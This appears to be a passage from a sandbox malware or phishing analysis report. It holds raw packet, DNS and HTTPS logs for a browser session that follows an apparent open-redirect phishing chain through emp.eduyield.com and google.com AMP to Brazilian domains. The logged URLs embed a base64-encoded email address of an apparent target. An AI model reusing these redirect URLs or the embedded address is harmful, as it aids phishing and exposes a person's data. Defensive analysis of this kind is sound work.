                      Aug 29, 2024 20:55:50.619369984 CEST44349747164.90.176.213192.168.2.4
                      Aug 29, 2024 20:55:50.619419098 CEST49747443192.168.2.4164.90.176.213
                      Aug 29, 2024 20:55:50.619904041 CEST44349747164.90.176.213192.168.2.4
                      Aug 29, 2024 20:55:50.619924068 CEST44349747164.90.176.213192.168.2.4
                      Aug 29, 2024 20:55:50.620883942 CEST44349747164.90.176.213192.168.2.4
                      Aug 29, 2024 20:55:50.620923042 CEST44349747164.90.176.213192.168.2.4
                      Aug 29, 2024 20:55:50.620932102 CEST49747443192.168.2.4164.90.176.213
                      Aug 29, 2024 20:55:50.620935917 CEST44349747164.90.176.213192.168.2.4
                      Aug 29, 2024 20:55:50.620946884 CEST49747443192.168.2.4164.90.176.213
                      Aug 29, 2024 20:55:50.620987892 CEST49747443192.168.2.4164.90.176.213
                      Aug 29, 2024 20:55:50.621823072 CEST44349747164.90.176.213192.168.2.4
                      Aug 29, 2024 20:55:50.621836901 CEST44349747164.90.176.213192.168.2.4
                      Aug 29, 2024 20:55:50.621895075 CEST49747443192.168.2.4164.90.176.213
                      Aug 29, 2024 20:55:50.621901035 CEST44349747164.90.176.213192.168.2.4
                      Aug 29, 2024 20:55:50.623040915 CEST49747443192.168.2.4164.90.176.213
                      Aug 29, 2024 20:55:50.701613903 CEST44349747164.90.176.213192.168.2.4
                      Aug 29, 2024 20:55:50.701628923 CEST44349747164.90.176.213192.168.2.4
                      Aug 29, 2024 20:55:50.701699018 CEST49747443192.168.2.4164.90.176.213
                      Aug 29, 2024 20:55:50.701729059 CEST44349747164.90.176.213192.168.2.4
                      Aug 29, 2024 20:55:50.701785088 CEST49747443192.168.2.4164.90.176.213
                      Aug 29, 2024 20:55:50.702373981 CEST44349747164.90.176.213192.168.2.4
                      Aug 29, 2024 20:55:50.702388048 CEST44349747164.90.176.213192.168.2.4
                      Aug 29, 2024 20:55:50.702455044 CEST49747443192.168.2.4164.90.176.213
                      Aug 29, 2024 20:55:50.702461958 CEST44349747164.90.176.213192.168.2.4
                      Aug 29, 2024 20:55:50.702501059 CEST49747443192.168.2.4164.90.176.213
                      Aug 29, 2024 20:55:50.703282118 CEST44349747164.90.176.213192.168.2.4
                      Aug 29, 2024 20:55:50.703300953 CEST44349747164.90.176.213192.168.2.4
                      Aug 29, 2024 20:55:50.703377008 CEST49747443192.168.2.4164.90.176.213
                      Aug 29, 2024 20:55:50.703383923 CEST44349747164.90.176.213192.168.2.4
                      Aug 29, 2024 20:55:50.703427076 CEST49747443192.168.2.4164.90.176.213
                      Aug 29, 2024 20:55:50.704509020 CEST44349747164.90.176.213192.168.2.4
                      Aug 29, 2024 20:55:50.704530954 CEST44349747164.90.176.213192.168.2.4
                      Aug 29, 2024 20:55:50.704581976 CEST49747443192.168.2.4164.90.176.213
                      Aug 29, 2024 20:55:50.704590082 CEST44349747164.90.176.213192.168.2.4
                      Aug 29, 2024 20:55:50.704633951 CEST49747443192.168.2.4164.90.176.213
                      Aug 29, 2024 20:55:50.705301046 CEST44349747164.90.176.213192.168.2.4
                      Aug 29, 2024 20:55:50.705316067 CEST44349747164.90.176.213192.168.2.4
                      Aug 29, 2024 20:55:50.705374002 CEST49747443192.168.2.4164.90.176.213
                      Aug 29, 2024 20:55:50.705380917 CEST44349747164.90.176.213192.168.2.4
                      Aug 29, 2024 20:55:50.705424070 CEST49747443192.168.2.4164.90.176.213
                      Aug 29, 2024 20:55:50.706238985 CEST49747443192.168.2.4164.90.176.213
                      Aug 29, 2024 20:55:50.706278086 CEST44349747164.90.176.213192.168.2.4
                      Aug 29, 2024 20:55:50.706295013 CEST44349747164.90.176.213192.168.2.4
                      Aug 29, 2024 20:55:50.706365108 CEST49747443192.168.2.4164.90.176.213
                      Aug 29, 2024 20:55:50.706372023 CEST44349747164.90.176.213192.168.2.4
                      Aug 29, 2024 20:55:50.706439018 CEST49747443192.168.2.4164.90.176.213
                      Aug 29, 2024 20:55:50.707217932 CEST44349747164.90.176.213192.168.2.4
                      Aug 29, 2024 20:55:50.707231998 CEST44349747164.90.176.213192.168.2.4
                      Aug 29, 2024 20:55:50.707298994 CEST49747443192.168.2.4164.90.176.213
                      Aug 29, 2024 20:55:50.707305908 CEST44349747164.90.176.213192.168.2.4
                      Aug 29, 2024 20:55:50.707355976 CEST49747443192.168.2.4164.90.176.213
                      Aug 29, 2024 20:55:50.707977057 CEST44349747164.90.176.213192.168.2.4
                      Aug 29, 2024 20:55:50.707993031 CEST44349747164.90.176.213192.168.2.4
                      Aug 29, 2024 20:55:50.708046913 CEST49747443192.168.2.4164.90.176.213
                      Aug 29, 2024 20:55:50.708054066 CEST44349747164.90.176.213192.168.2.4
                      Aug 29, 2024 20:55:50.708082914 CEST49747443192.168.2.4164.90.176.213
                      Aug 29, 2024 20:55:50.708098888 CEST49747443192.168.2.4164.90.176.213
                      Aug 29, 2024 20:55:50.806579113 CEST44349747164.90.176.213192.168.2.4
                      Aug 29, 2024 20:55:50.806598902 CEST44349747164.90.176.213192.168.2.4
                      Aug 29, 2024 20:55:50.806664944 CEST49747443192.168.2.4164.90.176.213
                      Aug 29, 2024 20:55:50.806677103 CEST44349747164.90.176.213192.168.2.4
                      Aug 29, 2024 20:55:50.806725979 CEST49747443192.168.2.4164.90.176.213
                      Aug 29, 2024 20:55:50.807365894 CEST44349747164.90.176.213192.168.2.4
                      Aug 29, 2024 20:55:50.807382107 CEST44349747164.90.176.213192.168.2.4
                      Aug 29, 2024 20:55:50.807436943 CEST49747443192.168.2.4164.90.176.213
                      Aug 29, 2024 20:55:50.807442904 CEST44349747164.90.176.213192.168.2.4
                      Aug 29, 2024 20:55:50.807482004 CEST49747443192.168.2.4164.90.176.213
                      Aug 29, 2024 20:55:50.808070898 CEST44349747164.90.176.213192.168.2.4
                      Aug 29, 2024 20:55:50.808088064 CEST44349747164.90.176.213192.168.2.4
                      Aug 29, 2024 20:55:50.808160067 CEST49747443192.168.2.4164.90.176.213
                      Aug 29, 2024 20:55:50.808166981 CEST44349747164.90.176.213192.168.2.4
                      Aug 29, 2024 20:55:50.808208942 CEST49747443192.168.2.4164.90.176.213
                      Aug 29, 2024 20:55:50.809029102 CEST44349747164.90.176.213192.168.2.4
                      Aug 29, 2024 20:55:50.809046030 CEST44349747164.90.176.213192.168.2.4
                      Aug 29, 2024 20:55:50.809123039 CEST49747443192.168.2.4164.90.176.213
                      Aug 29, 2024 20:55:50.809129000 CEST44349747164.90.176.213192.168.2.4
                      Aug 29, 2024 20:55:50.809171915 CEST49747443192.168.2.4164.90.176.213
                      Aug 29, 2024 20:55:50.810029984 CEST44349747164.90.176.213192.168.2.4
                      Aug 29, 2024 20:55:50.810050011 CEST44349747164.90.176.213192.168.2.4
                      Aug 29, 2024 20:55:50.810121059 CEST49747443192.168.2.4164.90.176.213
                      Aug 29, 2024 20:55:50.810133934 CEST44349747164.90.176.213192.168.2.4
                      Aug 29, 2024 20:55:50.810175896 CEST49747443192.168.2.4164.90.176.213
                      Aug 29, 2024 20:55:50.811158895 CEST44349747164.90.176.213192.168.2.4
                      Aug 29, 2024 20:55:50.811172009 CEST44349747164.90.176.213192.168.2.4
                      Aug 29, 2024 20:55:50.811255932 CEST49747443192.168.2.4164.90.176.213
                      Aug 29, 2024 20:55:50.811264038 CEST44349747164.90.176.213192.168.2.4
                      Aug 29, 2024 20:55:50.811454058 CEST49747443192.168.2.4164.90.176.213
                      Aug 29, 2024 20:55:50.812165976 CEST44349747164.90.176.213192.168.2.4
                      Aug 29, 2024 20:55:50.812242031 CEST49747443192.168.2.4164.90.176.213
                      Aug 29, 2024 20:55:50.812242985 CEST44349747164.90.176.213192.168.2.4
                      Aug 29, 2024 20:55:50.812252998 CEST44349747164.90.176.213192.168.2.4
                      Aug 29, 2024 20:55:50.812297106 CEST49747443192.168.2.4164.90.176.213
                      Aug 29, 2024 20:55:50.813035965 CEST44349747164.90.176.213192.168.2.4
                      Aug 29, 2024 20:55:50.813054085 CEST44349747164.90.176.213192.168.2.4
                      Aug 29, 2024 20:55:50.813150883 CEST49747443192.168.2.4164.90.176.213
                      Aug 29, 2024 20:55:50.813158989 CEST44349747164.90.176.213192.168.2.4
                      Aug 29, 2024 20:55:50.813205957 CEST49747443192.168.2.4164.90.176.213
                      Aug 29, 2024 20:55:50.816710949 CEST49747443192.168.2.4164.90.176.213
                      Aug 29, 2024 20:55:50.877779961 CEST44349747164.90.176.213192.168.2.4
                      Aug 29, 2024 20:55:50.877803087 CEST44349747164.90.176.213192.168.2.4
                      Aug 29, 2024 20:55:50.877882957 CEST49747443192.168.2.4164.90.176.213
                      Aug 29, 2024 20:55:50.877893925 CEST44349747164.90.176.213192.168.2.4
                      Aug 29, 2024 20:55:50.877943993 CEST49747443192.168.2.4164.90.176.213
                      Aug 29, 2024 20:55:50.878650904 CEST44349747164.90.176.213192.168.2.4
                      Aug 29, 2024 20:55:50.878664970 CEST44349747164.90.176.213192.168.2.4
                      Aug 29, 2024 20:55:50.878729105 CEST49747443192.168.2.4164.90.176.213
                      Aug 29, 2024 20:55:50.878736019 CEST44349747164.90.176.213192.168.2.4
                      Aug 29, 2024 20:55:50.878814936 CEST49747443192.168.2.4164.90.176.213
                      Aug 29, 2024 20:55:50.879450083 CEST44349747164.90.176.213192.168.2.4
                      Aug 29, 2024 20:55:50.879466057 CEST44349747164.90.176.213192.168.2.4
                      Aug 29, 2024 20:55:50.879528046 CEST49747443192.168.2.4164.90.176.213
                      Aug 29, 2024 20:55:50.879534960 CEST44349747164.90.176.213192.168.2.4
                      Aug 29, 2024 20:55:50.879576921 CEST49747443192.168.2.4164.90.176.213
                      Aug 29, 2024 20:55:50.880640984 CEST44349747164.90.176.213192.168.2.4
                      Aug 29, 2024 20:55:50.880655050 CEST44349747164.90.176.213192.168.2.4
                      Aug 29, 2024 20:55:50.880744934 CEST49747443192.168.2.4164.90.176.213
                      Aug 29, 2024 20:55:50.880752087 CEST44349747164.90.176.213192.168.2.4
                      Aug 29, 2024 20:55:50.880804062 CEST49747443192.168.2.4164.90.176.213
                      Aug 29, 2024 20:55:50.881582022 CEST44349747164.90.176.213192.168.2.4
                      Aug 29, 2024 20:55:50.881597996 CEST44349747164.90.176.213192.168.2.4
                      Aug 29, 2024 20:55:50.881674051 CEST49747443192.168.2.4164.90.176.213
                      Aug 29, 2024 20:55:50.881680965 CEST44349747164.90.176.213192.168.2.4
                      Aug 29, 2024 20:55:50.881724119 CEST49747443192.168.2.4164.90.176.213
                      Aug 29, 2024 20:55:50.882756948 CEST44349747164.90.176.213192.168.2.4
                      Aug 29, 2024 20:55:50.882771969 CEST44349747164.90.176.213192.168.2.4
                      Aug 29, 2024 20:55:50.882839918 CEST49747443192.168.2.4164.90.176.213
                      Aug 29, 2024 20:55:50.882846117 CEST44349747164.90.176.213192.168.2.4
                      Aug 29, 2024 20:55:50.882904053 CEST49747443192.168.2.4164.90.176.213
                      Aug 29, 2024 20:55:50.883074999 CEST44349747164.90.176.213192.168.2.4
                      Aug 29, 2024 20:55:50.883090019 CEST44349747164.90.176.213192.168.2.4
                      Aug 29, 2024 20:55:50.883150101 CEST49747443192.168.2.4164.90.176.213
                      Aug 29, 2024 20:55:50.883157969 CEST44349747164.90.176.213192.168.2.4
                      Aug 29, 2024 20:55:50.883219957 CEST49747443192.168.2.4164.90.176.213
                      Aug 29, 2024 20:55:50.883961916 CEST44349747164.90.176.213192.168.2.4
                      Aug 29, 2024 20:55:50.883975983 CEST44349747164.90.176.213192.168.2.4
                      Aug 29, 2024 20:55:50.884052992 CEST49747443192.168.2.4164.90.176.213
                      Aug 29, 2024 20:55:50.884061098 CEST44349747164.90.176.213192.168.2.4
                      Aug 29, 2024 20:55:50.884104967 CEST49747443192.168.2.4164.90.176.213
                      Aug 29, 2024 20:55:50.902060032 CEST49747443192.168.2.4164.90.176.213
                      Aug 29, 2024 20:55:50.961656094 CEST44349747164.90.176.213192.168.2.4
                      Aug 29, 2024 20:55:50.961698055 CEST44349747164.90.176.213192.168.2.4
                      Aug 29, 2024 20:55:50.961735964 CEST49747443192.168.2.4164.90.176.213
                      Aug 29, 2024 20:55:50.961741924 CEST44349747164.90.176.213192.168.2.4
                      Aug 29, 2024 20:55:50.961776972 CEST44349747164.90.176.213192.168.2.4
                      Aug 29, 2024 20:55:50.961792946 CEST49747443192.168.2.4164.90.176.213
                      Aug 29, 2024 20:55:50.961818933 CEST49747443192.168.2.4164.90.176.213
                      Aug 29, 2024 20:55:51.078860044 CEST49747443192.168.2.4164.90.176.213
                      Aug 29, 2024 20:55:51.078893900 CEST44349747164.90.176.213192.168.2.4
                      Aug 29, 2024 20:55:51.840204000 CEST49672443192.168.2.4173.222.162.32
                      Aug 29, 2024 20:55:51.840236902 CEST44349672173.222.162.32192.168.2.4
                      Aug 29, 2024 20:55:54.883189917 CEST4972380192.168.2.4163.171.128.244
                      Aug 29, 2024 20:55:54.888242960 CEST8049723163.171.128.244192.168.2.4
                      Aug 29, 2024 20:55:54.888326883 CEST4972380192.168.2.4163.171.128.244
                      Aug 29, 2024 20:56:25.527626038 CEST49735443192.168.2.4107.23.245.109
                      Aug 29, 2024 20:56:25.527643919 CEST44349735107.23.245.109192.168.2.4
                      Aug 29, 2024 20:56:34.523953915 CEST49746443192.168.2.4164.90.176.213
                      Aug 29, 2024 20:56:34.523983002 CEST44349746164.90.176.213192.168.2.4
                      Aug 29, 2024 20:56:38.449917078 CEST4972480192.168.2.4163.171.128.244
                      Aug 29, 2024 20:56:38.455025911 CEST8049724163.171.128.244192.168.2.4
                      Aug 29, 2024 20:56:38.455085993 CEST4972480192.168.2.4163.171.128.244
                      Aug 29, 2024 20:56:42.419753075 CEST49735443192.168.2.4107.23.245.109
                      Aug 29, 2024 20:56:42.419855118 CEST44349735107.23.245.109192.168.2.4
                      Aug 29, 2024 20:56:42.419946909 CEST49735443192.168.2.4107.23.245.109
                      Aug 29, 2024 20:56:42.653667927 CEST49757443192.168.2.4142.250.185.228
                      Aug 29, 2024 20:56:42.653702021 CEST44349757142.250.185.228192.168.2.4
                      Aug 29, 2024 20:56:42.653937101 CEST49757443192.168.2.4142.250.185.228
                      Aug 29, 2024 20:56:42.654043913 CEST49757443192.168.2.4142.250.185.228
                      Aug 29, 2024 20:56:42.654057980 CEST44349757142.250.185.228192.168.2.4
                      Aug 29, 2024 20:56:43.316251993 CEST44349757142.250.185.228192.168.2.4
                      Aug 29, 2024 20:56:43.316534042 CEST49757443192.168.2.4142.250.185.228
                      Aug 29, 2024 20:56:43.316554070 CEST44349757142.250.185.228192.168.2.4
                      Aug 29, 2024 20:56:43.316827059 CEST44349757142.250.185.228192.168.2.4
                      Aug 29, 2024 20:56:43.317214966 CEST49757443192.168.2.4142.250.185.228
                      Aug 29, 2024 20:56:43.317269087 CEST44349757142.250.185.228192.168.2.4
                      Aug 29, 2024 20:56:43.358967066 CEST49757443192.168.2.4142.250.185.228
                      Aug 29, 2024 20:56:49.380577087 CEST44349746164.90.176.213192.168.2.4
                      Aug 29, 2024 20:56:49.380669117 CEST44349746164.90.176.213192.168.2.4
                      Aug 29, 2024 20:56:49.380737066 CEST49746443192.168.2.4164.90.176.213
                      Aug 29, 2024 20:56:50.419805050 CEST49746443192.168.2.4164.90.176.213
                      Aug 29, 2024 20:56:50.419857025 CEST44349746164.90.176.213192.168.2.4
                      Aug 29, 2024 20:56:53.216341972 CEST44349757142.250.185.228192.168.2.4
                      Aug 29, 2024 20:56:53.216389894 CEST44349757142.250.185.228192.168.2.4
                      Aug 29, 2024 20:56:53.216459036 CEST49757443192.168.2.4142.250.185.228
                      Aug 29, 2024 20:56:54.420500994 CEST49757443192.168.2.4142.250.185.228
                      Aug 29, 2024 20:56:54.420531988 CEST44349757142.250.185.228192.168.2.4

                      UDP Packets

                      TimestampSource PortDest PortSource IPDest IP
                      Aug 29, 2024 20:55:38.148050070 CEST53655241.1.1.1192.168.2.4
                      Aug 29, 2024 20:55:38.148276091 CEST53603111.1.1.1192.168.2.4
                      Aug 29, 2024 20:55:39.227493048 CEST53577201.1.1.1192.168.2.4
                      Aug 29, 2024 20:55:39.737953901 CEST5363053192.168.2.41.1.1.1
                      Aug 29, 2024 20:55:39.738153934 CEST5832153192.168.2.41.1.1.1
                      Aug 29, 2024 20:55:39.755132914 CEST53583211.1.1.1192.168.2.4
                      Aug 29, 2024 20:55:39.756931067 CEST53536301.1.1.1192.168.2.4
                      Aug 29, 2024 20:55:40.562952042 CEST5251253192.168.2.41.1.1.1
                      Aug 29, 2024 20:55:40.563113928 CEST5575553192.168.2.41.1.1.1
                      Aug 29, 2024 20:55:40.572577953 CEST53557551.1.1.1192.168.2.4
                      Aug 29, 2024 20:55:40.572700977 CEST53525121.1.1.1192.168.2.4
                      Aug 29, 2024 20:55:40.574393034 CEST5858953192.168.2.41.1.1.1
                      Aug 29, 2024 20:55:40.574609995 CEST5589153192.168.2.41.1.1.1
                      Aug 29, 2024 20:55:40.581312895 CEST53585891.1.1.1192.168.2.4
                      Aug 29, 2024 20:55:40.582004070 CEST53558911.1.1.1192.168.2.4
                      Aug 29, 2024 20:55:41.661839008 CEST5862153192.168.2.41.1.1.1
                      Aug 29, 2024 20:55:41.662409067 CEST5232553192.168.2.41.1.1.1
                      Aug 29, 2024 20:55:41.668840885 CEST53586211.1.1.1192.168.2.4
                      Aug 29, 2024 20:55:41.669080973 CEST53523251.1.1.1192.168.2.4
                      Aug 29, 2024 20:55:42.602835894 CEST5982753192.168.2.41.1.1.1
                      Aug 29, 2024 20:55:42.603764057 CEST5162553192.168.2.41.1.1.1
                      Aug 29, 2024 20:55:42.609837055 CEST53598271.1.1.1192.168.2.4
                      Aug 29, 2024 20:55:42.610655069 CEST53516251.1.1.1192.168.2.4
                      Aug 29, 2024 20:55:44.068468094 CEST5810553192.168.2.41.1.1.1
                      Aug 29, 2024 20:55:44.069775105 CEST6363653192.168.2.41.1.1.1
                      Aug 29, 2024 20:55:44.077169895 CEST53581051.1.1.1192.168.2.4
                      Aug 29, 2024 20:55:44.463423014 CEST53636361.1.1.1192.168.2.4
                      Aug 29, 2024 20:55:48.391925097 CEST5606953192.168.2.41.1.1.1
                      Aug 29, 2024 20:55:48.392189980 CEST5857553192.168.2.41.1.1.1
                      Aug 29, 2024 20:55:48.775193930 CEST53560691.1.1.1192.168.2.4
                      Aug 29, 2024 20:55:49.347513914 CEST53585751.1.1.1192.168.2.4
                      Aug 29, 2024 20:55:50.143605947 CEST138138192.168.2.4192.168.2.255
                      Aug 29, 2024 20:55:56.392741919 CEST53534561.1.1.1192.168.2.4
                      Aug 29, 2024 20:56:15.396338940 CEST53607391.1.1.1192.168.2.4
                      Aug 29, 2024 20:56:38.066056013 CEST53578501.1.1.1192.168.2.4
                      Aug 29, 2024 20:56:38.273346901 CEST53545541.1.1.1192.168.2.4

                      ICMP Packets

                      TimestampSource IPDest IPChecksumCodeType
                      Aug 29, 2024 20:55:44.463495016 CEST192.168.2.41.1.1.1c248(Port unreachable)Destination Unreachable
                      Aug 29, 2024 20:55:49.347613096 CEST192.168.2.41.1.1.1c259(Port unreachable)Destination Unreachable

                      DNS Queries

                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                      Aug 29, 2024 20:55:39.737953901 CEST192.168.2.41.1.1.10xefe8Standard query (0)emp.eduyield.comA (IP address)IN (0x0001)false
                      Aug 29, 2024 20:55:39.738153934 CEST192.168.2.41.1.1.10xbb96Standard query (0)emp.eduyield.com65IN (0x0001)false
                      Aug 29, 2024 20:55:40.562952042 CEST192.168.2.41.1.1.10x1bcdStandard query (0)google.comA (IP address)IN (0x0001)false
                      Aug 29, 2024 20:55:40.563113928 CEST192.168.2.41.1.1.10x9130Standard query (0)google.com65IN (0x0001)false
                      Aug 29, 2024 20:55:40.574393034 CEST192.168.2.41.1.1.10x35f7Standard query (0)google.comA (IP address)IN (0x0001)false
                      Aug 29, 2024 20:55:40.574609995 CEST192.168.2.41.1.1.10x91c7Standard query (0)google.com65IN (0x0001)false
                      Aug 29, 2024 20:55:41.661839008 CEST192.168.2.41.1.1.10x55e5Standard query (0)google.comA (IP address)IN (0x0001)false
                      Aug 29, 2024 20:55:41.662409067 CEST192.168.2.41.1.1.10xc4a1Standard query (0)google.com65IN (0x0001)false
                      Aug 29, 2024 20:55:42.602835894 CEST192.168.2.41.1.1.10x5a48Standard query (0)www.google.comA (IP address)IN (0x0001)false
                      Aug 29, 2024 20:55:42.603764057 CEST192.168.2.41.1.1.10x34a1Standard query (0)www.google.com65IN (0x0001)false
                      Aug 29, 2024 20:55:44.068468094 CEST192.168.2.41.1.1.10x55a8Standard query (0)canoassuplementos.com.brA (IP address)IN (0x0001)false
                      Aug 29, 2024 20:55:44.069775105 CEST192.168.2.41.1.1.10x92f6Standard query (0)canoassuplementos.com.br65IN (0x0001)false
                      Aug 29, 2024 20:55:48.391925097 CEST192.168.2.41.1.1.10xd47eStandard query (0)hdjdsigfhgejw.caririinovacao.com.brA (IP address)IN (0x0001)false
                      Aug 29, 2024 20:55:48.392189980 CEST192.168.2.41.1.1.10x975dStandard query (0)hdjdsigfhgejw.caririinovacao.com.br65IN (0x0001)false

                      DNS Answers

                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                      Aug 29, 2024 20:55:39.756931067 CEST1.1.1.1192.168.2.40xefe8No error (0)emp.eduyield.com107.23.245.109A (IP address)IN (0x0001)false
                      Aug 29, 2024 20:55:39.756931067 CEST1.1.1.1192.168.2.40xefe8No error (0)emp.eduyield.com3.211.51.78A (IP address)IN (0x0001)false
                      Aug 29, 2024 20:55:39.756931067 CEST1.1.1.1192.168.2.40xefe8No error (0)emp.eduyield.com54.165.150.163A (IP address)IN (0x0001)false
                      Aug 29, 2024 20:55:40.572577953 CEST1.1.1.1192.168.2.40x9130No error (0)google.com65IN (0x0001)false
                      Aug 29, 2024 20:55:40.572700977 CEST1.1.1.1192.168.2.40x1bcdNo error (0)google.com142.250.181.238A (IP address)IN (0x0001)false
                      Aug 29, 2024 20:55:40.581312895 CEST1.1.1.1192.168.2.40x35f7No error (0)google.com142.250.185.110A (IP address)IN (0x0001)false
                      Aug 29, 2024 20:55:40.582004070 CEST1.1.1.1192.168.2.40x91c7No error (0)google.com65IN (0x0001)false
                      Aug 29, 2024 20:55:41.668840885 CEST1.1.1.1192.168.2.40x55e5No error (0)google.com142.250.181.238A (IP address)IN (0x0001)false
                      Aug 29, 2024 20:55:41.669080973 CEST1.1.1.1192.168.2.40xc4a1No error (0)google.com65IN (0x0001)false
                      Aug 29, 2024 20:55:42.609837055 CEST1.1.1.1192.168.2.40x5a48No error (0)www.google.com142.250.185.228A (IP address)IN (0x0001)false
                      Aug 29, 2024 20:55:42.610655069 CEST1.1.1.1192.168.2.40x34a1No error (0)www.google.com65IN (0x0001)false
                      Aug 29, 2024 20:55:44.077169895 CEST1.1.1.1192.168.2.40x55a8No error (0)canoassuplementos.com.br191.252.144.224A (IP address)IN (0x0001)false
                      Aug 29, 2024 20:55:48.775193930 CEST1.1.1.1192.168.2.40xd47eNo error (0)hdjdsigfhgejw.caririinovacao.com.br164.90.176.213A (IP address)IN (0x0001)false
                      Aug 29, 2024 20:55:53.049932003 CEST1.1.1.1192.168.2.40x9e33No error (0)www.download.windowsupdate.com.download.ks-cdn.comk256-all.gslb.ksyuncdn.comCNAME (Canonical name)IN (0x0001)false
                      Aug 29, 2024 20:55:53.049932003 CEST1.1.1.1192.168.2.40x9e33No error (0)k256-all.gslb.ksyuncdn.com125.39.194.1A (IP address)IN (0x0001)false
                      Aug 29, 2024 20:55:53.049932003 CEST1.1.1.1192.168.2.40x9e33No error (0)k256-all.gslb.ksyuncdn.com42.56.77.10A (IP address)IN (0x0001)false
                      Aug 29, 2024 20:55:53.049932003 CEST1.1.1.1192.168.2.40x9e33No error (0)k256-all.gslb.ksyuncdn.com183.61.168.1A (IP address)IN (0x0001)false
                      Aug 29, 2024 20:55:53.049932003 CEST1.1.1.1192.168.2.40x9e33No error (0)k256-all.gslb.ksyuncdn.com183.61.243.1A (IP address)IN (0x0001)false
                      Aug 29, 2024 20:55:53.049932003 CEST1.1.1.1192.168.2.40x9e33No error (0)k256-all.gslb.ksyuncdn.com113.16.211.7A (IP address)IN (0x0001)false
                      Aug 29, 2024 20:55:53.049932003 CEST1.1.1.1192.168.2.40x9e33No error (0)k256-all.gslb.ksyuncdn.com175.6.254.70A (IP address)IN (0x0001)false
                      Aug 29, 2024 20:55:53.049932003 CEST1.1.1.1192.168.2.40x9e33No error (0)k256-all.gslb.ksyuncdn.com183.131.56.5A (IP address)IN (0x0001)false
                      Aug 29, 2024 20:55:53.049932003 CEST1.1.1.1192.168.2.40x9e33No error (0)k256-all.gslb.ksyuncdn.com124.225.141.1A (IP address)IN (0x0001)false
                      Aug 29, 2024 20:55:53.049932003 CEST1.1.1.1192.168.2.40x9e33No error (0)k256-all.gslb.ksyuncdn.com118.112.233.1A (IP address)IN (0x0001)false
                      Aug 29, 2024 20:55:53.049932003 CEST1.1.1.1192.168.2.40x9e33No error (0)k256-all.gslb.ksyuncdn.com163.177.116.4A (IP address)IN (0x0001)false
                      Aug 29, 2024 20:55:57.134439945 CEST1.1.1.1192.168.2.40xf04aNo error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                      Aug 29, 2024 20:55:57.134439945 CEST1.1.1.1192.168.2.40xf04aNo error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                      Aug 29, 2024 20:56:11.488559008 CEST1.1.1.1192.168.2.40x6ab8No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                      Aug 29, 2024 20:56:11.488559008 CEST1.1.1.1192.168.2.40x6ab8No error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                      Aug 29, 2024 20:56:30.580362082 CEST1.1.1.1192.168.2.40x8d1aNo error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                      Aug 29, 2024 20:56:30.580362082 CEST1.1.1.1192.168.2.40x8d1aNo error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                      Aug 29, 2024 20:56:51.098131895 CEST1.1.1.1192.168.2.40xa8a3No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                      Aug 29, 2024 20:56:51.098131895 CEST1.1.1.1192.168.2.40xa8a3No error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false

                      HTTP Request Dependency Graph

                      • emp.eduyield.com
                      • google.com.
                      • google.com
                      • www.google.com
                      • fs.microsoft.com
                      • canoassuplementos.com.br
                      • https:
                        • hdjdsigfhgejw.caririinovacao.com.br

                      HTTPS Proxied Packets

                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      0192.168.2.449736107.23.245.1094435768C:\Program Files\Google\Chrome\Application\chrome.exe
                      TimestampBytes transferredDirectionData
                      2024-08-29 18:55:40 UTC854OUTGET /el?aid=2t26dda0e6c-1865-11ef-80aa-0217a07992df&rid=33766156&pid=771868&cid=497&dest=google.com.////amp/s/canoassuplementos.com.br//////dayo/xljj3/bWZlcmVzQHBlby5vbi5jYQ==$%C3%A3%E2%82%AC%E2%80%9A HTTP/1.1
                      Host: emp.eduyield.com
                      Connection: keep-alive
                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                      sec-ch-ua-mobile: ?0
                      sec-ch-ua-platform: "Windows"
                      Upgrade-Insecure-Requests: 1
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                      Sec-Fetch-Site: none
                      Sec-Fetch-Mode: navigate
                      Sec-Fetch-User: ?1
                      Sec-Fetch-Dest: document
                      Accept-Encoding: gzip, deflate, br
                      Accept-Language: en-US,en;q=0.9
                      2024-08-29 18:55:40 UTC285INHTTP/1.1 303 See Other
                      Date: Thu, 29 Aug 2024 18:55:40 GMT
                      Content-Type: text/html; charset=UTF-8
                      Content-Length: 0
                      Connection: close
                      Server: nginx/1.27.1
                      Location: http://google.com.////amp/s/canoassuplementos.com.br//////dayo/xljj3/bWZlcmVzQHBlby5vbi5jYQ==$


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      1192.168.2.449738142.250.185.1104435768C:\Program Files\Google\Chrome\Application\chrome.exe
                      TimestampBytes transferredDirectionData
                      2024-08-29 18:55:41 UTC777OUTGET ////amp/s/canoassuplementos.com.br//////dayo/xljj3/bWZlcmVzQHBlby5vbi5jYQ==$%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A HTTP/1.1
                      Host: google.com.
                      Connection: keep-alive
                      Upgrade-Insecure-Requests: 1
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                      Sec-Fetch-Site: none
                      Sec-Fetch-Mode: navigate
                      Sec-Fetch-User: ?1
                      Sec-Fetch-Dest: document
